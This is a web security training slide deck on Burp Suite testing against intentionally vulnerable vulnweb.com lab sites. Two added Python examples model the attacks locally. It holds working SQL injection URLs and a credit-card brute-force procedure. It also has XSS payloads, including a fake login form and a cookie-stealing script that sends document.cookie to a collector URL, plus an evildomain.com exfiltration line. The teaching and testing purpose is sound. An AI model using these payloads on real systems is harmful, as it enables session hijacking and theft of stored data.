Adding Value to Automated Web Scans Burp Suite and Beyond


Page 1

Adding Value to Automated Web Scans

Burp Suite and Beyond

Page 2

Automated Scanning vs Manual Testing

• Manual Testing Tools/Suites
• At MSU - QualysGuard WAS & Burp Suite
• Automated Scanning - identify the attack surface across the organization
• Manual Testing - proxy tools used to verify scan results and find what automated scans miss
• Both are necessary in a large environment

Page 3

Automated Scanning vs Manual Testing

Strengths of Automated Scanners:
• Scheduling
• Reporting
• Scalability

Strengths of Manual Testing Tools:
• Proxy based - allows interception and modification of requests
• Customize payloads for vulnerability detection
• Verify findings from automated scan results

Page 4

Automated Scanning vs Manual Testing

Weaknesses of automated scanners:
• increased potential for false positives
• duplicate findings
• code coverage not as thorough

Weaknesses of manual testing:
• tester needs knowledge of the application for best results
• learning curve (developers already stretched thin)
• not scalable (e.g. distributing reports is very time consuming)

Page 5

Methodology

Reconnaissance
• Spider target
• Hidden files
• Google site search
• End result is a comprehensive map of the site

Discovery
• Automated scanning
• Manual detection and analysis

Exploit
• Automated exploit tools - sqlmap, havij, metasploit
• Burp Suite - hands-on testing

Page 6

Road Map

• Spider and vulnerability scan already performed
• Leverage Burp tools to expand upon the proof of concepts from the scan results
• Carry out actual attack scenarios

Page 7

Tools for this Demo

• Burp Suite
• Firefox
• FoxyProxy addon
• Firebug addon

Target: *.vulnweb.com (intentionally vulnerable websites from Acunetix)

Page 8

Scan Results

§ Vulnerability reports - the proof of concept (POC) includes the request payload and the application response
§ POCs are not intuitive and are often met with doubt
§ Need to be able to drive home the real risk

Page 9

Scan Report - XSS example

Page 10

Scan Report - SQLi example

Page 11

SQL Injection

Boolean Based SQLi (Blind SQL Injection)

Blind SQLi is possible if the application responds to true and false conditions in a detectable manner*

http://testphp.vulnweb.com/listproducts.php?artist=1 and 1=1 //true condition
http://testphp.vulnweb.com/listproducts.php?artist=1 and 1=2 //false condition

*Differences between the true and false responses can be subtle. The Burp Comparer tool highlights the differences between two responses.

Error Based SQLi

Possible if the application echoes database errors to the browser. The errors reveal information about the database that serves as clues for building an attack.

Page 12

Demo - SQLi

A Better Blind SQLi Proof of Concept

http://testphp.vulnweb.com/listproducts.php?artist=1 and substring(@@version,1,1)=4 and 1=1 // false
http://testphp.vulnweb.com/listproducts.php?artist=1 and substring(@@version,1,1)=5 and 1=1 // true

Unlike 1=1 / 1=2, this condition depends on a value only the database knows (@@version is the server's version string; the target answers true for a 5.x release), so the true/false pair shows that injected SQL is really being evaluated rather than that the page merely changes.

Page 13

SQLi Exploit Example

A Better Error Based SQLi POC

testphp.vulnweb.com/listproducts.php?artist=1' - error
testphp.vulnweb.com/listproducts.php?artist=1 union all select 1,2,3,4,5,6,7,8,9,10 - error
testphp.vulnweb.com/listproducts.php?artist=1 union all select 1,2,3,4,5,6,7,8,9,10,11 - no error!
testphp.vulnweb.com/listproducts.php?artist=1 union all select 1,2,3,4,5,6,7,8,9,10,11 from users - no error!

The column count (11 here) is found by adding columns until the UNION stops erroring; once it matches, the same SELECT can be pointed at another table such as users.

Page 14

Cross Site Scripting

XSS type 0 - DOM Based - the attack string is embedded in the URL and not processed by the server. It is executed in the DOM client-side (very much like reflected).

XSS type 1 - Reflected - the attack string is submitted with the request (usually in the URL) and the server embeds the string in the HTML of the response.

*DOM based and reflected XSS depend on social engineering to succeed: the victim has to be made to open the attacker's link.

XSS type 2 - Persistent (stored) XSS - the application stores the attack string so that it is presented in future responses.

Page 15

Reflected XSS Demo

Target: http://testasp.vulnweb.com/Search.asp?mSearch=

Goal: modify the page to look like a login form

Payload:

/Search.asp?mSearch=<script>document.getElementsByClassName('FramedForm').item(0).innerHTML = "password <div><input type='password' id='pw' /><input type='button' onclick='alert(pw.value)' value='login' /></div>"; document.getElementsByClassName('path').item(0).innerHTML = '';</script>

The alert() stands in for sending the captured password to the attacker.

*Requires social engineering: the victim has to follow the link. Obfuscate the query string (URL-encoding is the simplest way) so the script is not obvious from a glance at the link.

Page 16

Same Origin Policy

Same Origin Policy - SOP lets script running on a page read data (DOM, cookies, responses) that belongs to its own origin, while preventing it from reading data that belongs to a different origin. Without SOP the internet would be very unsafe: visit my evil site and I can direct your browser to read your logged-in session on any site I want.

The goal of the XSS attack is to subvert SOP to exfiltrate information. Because the injected script runs inside the vulnerable site's origin, it can read that site's data; it then sends the data out in a request the browser is allowed to make cross-origin.

Page 17

Bypassing SOP

Image source

You are allowed to include images whose source is outside of the application's domain:

<img src='http://evildomain.com/?id=' />

The src is an HTTP GET request. SOP restricts reading the reply, not sending the request, so whatever is appended to the URL reaches the other domain.

Example XSS

<div onmouseover="xssScript()"><img id='evil' src='http://evildomain.com/?id=' width='1' height='1' /></div>
<script>function xssScript(){ ……….. }</script>

Page 18

Persistent XSS Demo

Target: http://testphp.vulnweb.com/guestbook.php

Goal: inject JavaScript and an image to bypass SOP

Objective is to send the victim's cookie to my evil site: www.montana.edu/hardin/cookiejar.php?d={cookie}

Page 19

Persistent XSS Demo

Payload:

Hello<div onmouseover=addsource() style='width:100%'><img width='1' height='1' id='badimg' /></div> there
<script>
function addsource(){
  document.getElementById("badimg").src = "http://www.montana.edu/hardin/cookiejar.php?d=" + document.cookie;
}
</script>

The image starts without a src, so nothing is requested until the mouse crosses the full-width div; setting src then makes the browser issue a GET to the collector with the cookie in the query string.

Page 20

SOP has been subverted!!!
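As an added example (not from the slides), the persistent XSS demo above and its fix modelled in Python: a constructed stand-in for the guestbook renders stored entries either unencoded, as the vulnerable page does, or HTML-encoded on output; a parser-based check shows which rendering actually yields executable script; and two helpers show the cookie leaving in the image GET and arriving at the collector (the slide's cookiejar.php URL). The guestbook model, the sample cookie and the ScriptFinder check are assumptions for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlparse

# Constructed stand-in for guestbook.php: whatever is posted is stored and written
# straight back into every later response, which is what makes the XSS persistent.
COLLECTOR = "http://www.montana.edu/hardin/cookiejar.php"   # the slide's collector URL

# The slide's payload: the image has no src until the mouse crosses the full-width div,
# at which point script running in the guestbook's own origin points it at the collector.
PAYLOAD = (
    "Hello<div onmouseover=addsource() style='width:100%'>"
    "<img width='1' height='1' id='badimg' /></div> there"
    "<script>function addsource(){"
    "document.getElementById(\"badimg\").src=\"" + COLLECTOR + "?d=\"+document.cookie;"
    "}</script>"
)

def render_vulnerable(entries):
    """Original behaviour: stored text is inserted unencoded, so markup becomes live DOM."""
    return "<ul>" + "".join(f"<li>{e}</li>" for e in entries) + "</ul>"

def render_hardened(entries):
    """The fix: HTML-encode on output. Same stored bytes, now inert text."""
    return "<ul>" + "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries) + "</ul>"

class ScriptFinder(HTMLParser):
    """Collects what a browser would execute: <script> elements and on* event handlers."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("<script>")
        for name, _value in attrs:
            if name.startswith("on"):
                self.hits.append(f"<{tag} {name}>")

def executable_content(page):
    """Check a rendered page the way the browser parses it, not by grepping for strings."""
    finder = ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.hits

def exfil_url(cookie):
    """The GET the injected image issues once addsource() runs: the cookie rides in the
    query string of a request the browser is allowed to send cross-origin."""
    return COLLECTOR + "?d=" + quote(cookie, safe="")

def collector_receive(url):
    """What cookiejar.php sees on the attacker's side. The victim page never needs to
    read the reply, which is why SOP does not stop the leak."""
    return parse_qs(urlparse(url).query).get("d", [""])[0]

if __name__ == "__main__":
    print("vulnerable render executes:", executable_content(render_vulnerable([PAYLOAD])))
    print("hardened render executes:", executable_content(render_hardened([PAYLOAD])))
    # constructed sample cookie
    print("collector receives:", collector_receive(exfil_url("PHPSESSID=abc123; login=test")))
```

The check is done with html.parser rather than a substring search because the hardened output still contains the literal text onmouseover= and script; only a tag-level view distinguishes inert text from live markup, which is also why "the string is still on the page" is not evidence that a fix failed.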

Page 21

Questions

[email protected]

Page 22

SQLi Exploit Example

Goal: Use Intruder to brute force the value of the credit card field

1. Set the proxy to intercept
2. Submit the request in the browser:
   http://testphp.vulnweb.com/artists.php?artist=1 and (select substring(cc,1,1)=1 from users limit 0,1)=1
3. Send the intercepted request to the Intruder tool
4. Indicate the position(s) to be injected. Burp marks them with §; the candidate value is the one to brute force, and the substring offset is a second position if every character is wanted:
   http://testphp.vulnweb.com/artists.php?artist=1 and (select substring(cc,§1§,1)=§1§ from users limit 0,1)=1
5. Define the payloads (digits, for a card number)
6. Start Attack. Responses that match the "true" page from the 1=1 / 1=2 check (e.g. by response length) identify the character at that offset.
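As an added example (not from the slides), the boolean-blind detection of Page 11, the UNION column-count probing of Page 13 and the Intruder brute force of Page 22 carried out as one Python script against a constructed in-memory SQLite stand-in for listproducts.php. The table layout, the three-column SELECT and the sample card number are assumptions; the real target is MySQL, and the two dialect differences that matter (substring vs substr, the LIMIT spelling) are noted in comments. The technique is the slides' own; this only shows what Comparer and Intruder are doing by hand.

```python
import difflib
import sqlite3
import string

# Constructed stand-in for listproducts.php: an in-memory SQLite database with a products
# table and a users table holding one made-up card number. The artist parameter is
# concatenated straight into the query, which is the defect the scan report flags.
def _build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, artist INTEGER, name TEXT);
        CREATE TABLE users(uname TEXT, cc TEXT);
        INSERT INTO products VALUES (1, 1, 'Picture 1'), (2, 1, 'Picture 2'), (3, 2, 'Picture 3');
        INSERT INTO users VALUES ('test', '4111111111111111');
    """)
    return conn

DB = _build_db()

def listproducts(artist):
    """Vulnerable endpoint: returns the page body, or the raw database error (error-based SQLi)."""
    sql = "SELECT id, name, artist FROM products WHERE artist=" + artist   # injection point
    try:
        rows = DB.execute(sql).fetchall()
    except sqlite3.Error as e:
        return "Error: " + str(e)
    lines = ["<h1>pictures</h1>", "<ul>"] + [f"<li>{r[1]}</li>" for r in rows] + ["</ul>"]
    return "\n".join(lines)

def response_diff(page_a, page_b):
    """Comparer-style view: only the lines that differ between two responses."""
    return [l for l in difflib.ndiff(page_a.splitlines(), page_b.splitlines())
            if l.startswith(("- ", "+ "))]

def boolean_oracle(probe, true_page, false_page):
    """Decide whether an injected condition evaluated true by matching the response
    against the two baselines recorded from 'and 1=1' / 'and 1=2'."""
    page = listproducts(probe)
    if page == true_page:
        return True
    if page == false_page:
        return False
    raise ValueError("response matches neither baseline; the probe broke the query")

def find_column_count(max_cols=20):
    """Page 13 technique: grow the UNION SELECT until the database stops erroring."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if not listproducts(f"1 union all select {cols}").startswith("Error"):
            return n
    return None

def dump_cc_via_union():
    """With the column count known, route users.cc into the column the page displays."""
    n = find_column_count()
    cols = ["1"] * n
    cols[1] = "cc"                      # column 2 is rendered as the product name
    page = listproducts(f"1 union all select {','.join(cols)} from users")
    items = [l[len("<li>"):-len("</li>")] for l in page.splitlines() if l.startswith("<li>")]
    return items[-1]                    # UNION rows are appended after the real products

def brute_force_cc(alphabet=string.digits, max_len=32):
    """Page 22 as a loop: what Intruder does with two payload positions, the substring
    offset and the candidate character, judged against the true/false baselines."""
    true_page = listproducts("1 and 1=1")
    false_page = listproducts("1 and 1=2")
    value = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # MySQL substring(cc,pos,1) is substr() in SQLite; the slide's 'limit 0,1'
            # is written as 'limit 1 offset 0', which both dialects accept.
            probe = f"1 and (select substr(cc,{pos},1)='{ch}' from users limit 1 offset 0)=1"
            if boolean_oracle(probe, true_page, false_page):
                value += ch
                break
        else:
            break                       # nothing matched: past the end of the value
    return value

if __name__ == "__main__":
    true_page, false_page = listproducts("1 and 1=1"), listproducts("1 and 1=2")
    print("what Comparer would highlight:", response_diff(true_page, false_page))
    print("error-based probe:", listproducts("1'"))
    print("UNION column count:", find_column_count())
    print("cc via UNION:", dump_cc_via_union())
    print("cc via blind brute force:", brute_force_cc())
```

The UNION route needs one request per column guess plus one to read the value; the blind route needs up to ten requests per digit, which is why the scan report's boolean POC is worth upgrading to error- or UNION-based extraction wherever the application echoes errors. The oracle raises instead of guessing when a response matches neither baseline, the same situation in which sorting Intruder results by length would mislead.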